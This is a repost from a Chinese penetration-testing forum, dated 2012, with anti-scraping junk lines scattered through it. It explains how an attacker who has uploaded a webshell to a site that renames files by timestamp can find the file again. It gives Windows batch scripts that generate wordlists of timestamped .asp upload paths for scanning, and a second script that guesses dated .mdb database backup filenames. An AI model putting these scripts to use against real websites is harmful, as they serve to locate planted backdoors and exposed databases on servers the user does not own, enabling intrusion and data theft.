中国网络渗透测试联盟
标题:
针对上传木马找不到名字的解决办法
[打印本页]
作者:
admin
时间:
2012-9-5 15:04
标题:
针对上传木马找不到名字的解决办法
今天在一个人博客里面看到的,地址是:
http://www.0xsec.com/?p=260
& u" [( t) j) A) b! }# Q+ }
! F+ d$ Y) D, f- G7 O5 O, x' Y
感觉思路蛮好的,而且在t00ls也没有找到相关文章,我就转过来给大家瞧瞧!
, a& Y2 K( s( R! y! g
; ^+ n1 t% i! y
——————————————————–
k u: k6 p9 S
有时 传了 木马上去后 直接是 xiaoma.asp
# K( C7 {$ t* m; v" B7 Y
还有种 是按照时间生成名字如201103091**************.asp
1 a4 X$ z" z$ g' K5 v4 o
下面这种如果又 没有回显的话 就可以做 个字典扫
2 f) f) ?3 r5 I8 p: w8 m& @
生成字典
3 \5 i- R b% X u
uploadfile/2011/1/1/2011012847000000.asp
1 y" ]$ n& Q/ K9 X
uploadfile/2011/1/1/2011012847000001.asp
- \5 p J' Y8 v* V3 g i2 B; Y
uploadfile/2011/1/1/2011012847000002.asp
) J4 q: X) u( ?; |
uploadfile/2011/1/1/2011012847000003.asp
4 W* |! }/ ^/ [3 t
uploadfile/2011/1/1/2011012847000004.asp
- u- E! [0 Y$ r- d& \( n d
——————————————————-
" I. z$ ?" K; u, e9 O
建议只 生成 上传 那1分种左右 如果你电脑 与网站服务器时间差距太大 就 多做点
: V5 _ `$ X; N+ S5 G
@echo off
4 r2 U) Z2 [: s x- v" h
for %%a in (2011012847) do (
7 S/ T3 K9 [ X& G0 R! A
for %%o in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28) do (
& h4 R, y0 x3 c8 @4 ?! p7 h: R
for %%b in (0 1 2 3 4 5 6 7 8 9) do (
4 G/ U( m; ?! p! `6 W
for %%c in (0 1 2 3 4 5 6 7 8 9) do (
. P5 s9 P$ R7 S! `) ~ _
for %%d in (0 1 2 3 4 5 6 7 8 9) do (
. L1 y% ~. H, B) v: A& e
for %%e in (0 1 2 3 4 5 6 7 8 9) do (
E" ]7 b/ y7 o; H! M
for %%f in (0 1 2 3 4 5 6 7 8 9) do (
" s% B/ w- i4 ?- s
for %%g in (0 1 2 3 4 5 6 7 8 9) do (
( j5 u, u2 m: ^$ X; ^$ p8 x
echo uploadfile/2011/1/%%o/%%a%%b%%c%%d%%e%%f%%g.asp >>data.log
( K. H1 p0 z2 d
))))))))
. n0 d( x- t. w; k4 U3 Q
代码 如上 自己修改即可。 便有了小马的路径。方法不错。值得欣赏。
$ \" A+ `7 F l F6 j
由此思路修改可以针对数据库备份扫描。
8 ?1 F' M- M0 i8 w6 {) x% K4 M
恩不错,还可以写个时间备份数据库文件扫描
) Y) N8 Z8 s5 J2 g, X
@echo off
* W3 i+ X% G5 F" t
for %%a in (2007 2008 2009 2010) do (
% W \- m, w& i# B t+ K7 u. P
for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do (
& u; I* ^% D0 H; S. d8 r
for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do (
7 _) T2 E0 E. }$ e9 ]
echo databackup/%%a-%%b-%%c.mdb >>data.log
$ q- `/ ?- J4 u4 U. Y' I
)))
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2